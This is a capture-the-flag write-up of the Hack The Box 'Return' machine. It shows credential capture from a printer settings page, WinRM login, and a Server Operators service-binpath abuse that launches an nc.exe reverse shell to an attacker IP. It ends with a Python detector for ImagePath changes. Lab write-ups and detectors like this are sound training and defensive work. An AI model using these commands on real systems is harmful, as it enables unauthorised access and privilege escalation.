HTB - Return

Easy Machine

Enumeration

We start with our nmap scan

nmap -p- --open -sS -sCV --min-rate 5000 -n -Pn -vvv 10.10.11.108 -oN Targeted

Some ports found are:

80,135,139,389,445

Port 80 serves a web page with a few inputs, and its "Server Port" field is set to 389. I tried changing the "Server Address" input to my IP address.

With tcpdump running, we get some responses:

tcpdump -i tun0 -n icmp

And just by listening with nc on port 389, we get some output:

Some creds were found:

svc-printer:1edFg43012 !!

Shell as svc-printer

Testing those creds with crackmapexec shows they are valid:

crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

Checking whether our user is part of the "Remote Management Users" group was also successful:

crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

So I just used evil-winrm to log into the machine:

evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012 !!'

Shell as System

Running "whoami /all" shows SeBackupPrivilege and SeRestorePrivilege, along with membership of the Server Operators group.

Server Operators

“A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.”

Let's try to modify a service as described here: https://cube0x0.github.io/Pocing-Beyond-DA/

As a member of this group, I can modify any service on the system.

My attempt to create a new service was denied.

However, checking whether I could start and stop services was successful.

I used binpath to change the executable path of the VSS service so that it pointed to a nc.exe that I had uploaded, which would send me back a reverse shell:

sc.exe config VSS binpath="C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.11 443"

Now, by starting the service and listening on port 443, we got NT AUTHORITY\SYSTEM.
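On the defender's side, the binpath change above is written to the registry as the service's ImagePath value. The following is an added example, not part of the original write-up, that flags such changes in records shaped like Sysmon Event ID 13 (registry value set); the sample events, their timestamps and the trusted-directory list are constructed assumptions.

```python
import re

# Constructed records shaped like Sysmon Event ID 13 (assumes Sysmon monitors the Services key).
SCM = r"C:\Windows\system32\services.exe"   # sc.exe config is applied by the service control manager
SVC = r"HKLM\System\CurrentControlSet\Services"
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2022-01-01 10:00:00.000", "Image": SCM,
     "TargetObject": SVC + r"\VSS\ImagePath",
     "Details": r"C:\Users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.11 443"},
    {"EventID": 13, "UtcTime": "2022-01-01 10:05:00.000", "Image": SCM,
     "TargetObject": SVC + r"\VSS\ImagePath",
     "Details": r"%SystemRoot%\system32\vssvc.exe"},
    {"EventID": 13, "UtcTime": "2022-01-01 10:06:00.000", "Image": SCM,
     "TargetObject": SVC + r"\ExampleAgent\ImagePath",      # hypothetical service
     "Details": r'"C:\Program Files\Example\agent.exe" --service'},
    {"EventID": 13, "UtcTime": "2022-01-01 10:07:00.000", "Image": SCM,
     "TargetObject": SVC + r"\VSS\Start", "Details": "DWORD (0x00000003)"},
]

IMAGEPATH_KEY = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I)
# Assumption: service binaries normally live under these directories.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def executable_of(image_path):
    """Return the normalised executable path from a service ImagePath command line."""
    s = image_path.strip()
    if s.startswith('"'):                       # quoted path, arguments follow the quote
        exe = s[1:].split('"', 1)[0]
    else:                                       # unquoted: cut at the first executable extension
        m = re.match(r"(.+?\.(?:exe|sys|dll|bat|cmd))(?:\s|$)", s, re.I)
        exe = m.group(1) if m else s.split(" ", 1)[0]
    exe = exe.lower().replace("/", "\\")
    if exe.startswith("\\??\\"):                # NT-style prefix used by some drivers
        exe = exe[4:]
    exe = re.sub(r"^(%systemroot%|%windir%|\\systemroot)\\", r"c:\\windows\\", exe)
    return "c:\\windows\\" + exe if exe.startswith("system32\\") else exe

def suspicious_imagepath_changes(events):
    """Flag ImagePath writes whose executable sits outside the trusted directories."""
    findings = []
    for ev in events:
        m = IMAGEPATH_KEY.match(ev.get("TargetObject", ""))
        if ev.get("EventID") != 13 or not m:
            continue
        exe = executable_of(ev.get("Details", ""))
        if not exe.startswith(TRUSTED_DIRS):
            findings.append({"service": m.group(1), "time": ev["UtcTime"], "executable": exe})
    return findings
```

The directory allow-list is deliberately coarse; a production rule would also compare the new value against a per-service baseline.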


That was all for today's write-up. I hope you've enjoyed it.

I will be uploading a new write-up every weekend, so don't forget to keep an eye on the blog 😄

You can use my social media to leave me your thoughts about the write-ups 👍

Twitter: https://twitter.com/KrakenEU_
Linkedin: https://www.linkedin.com/in/i%C3%B1aki-tornos-572580177/
Github: https://github.com/KrakenEU/
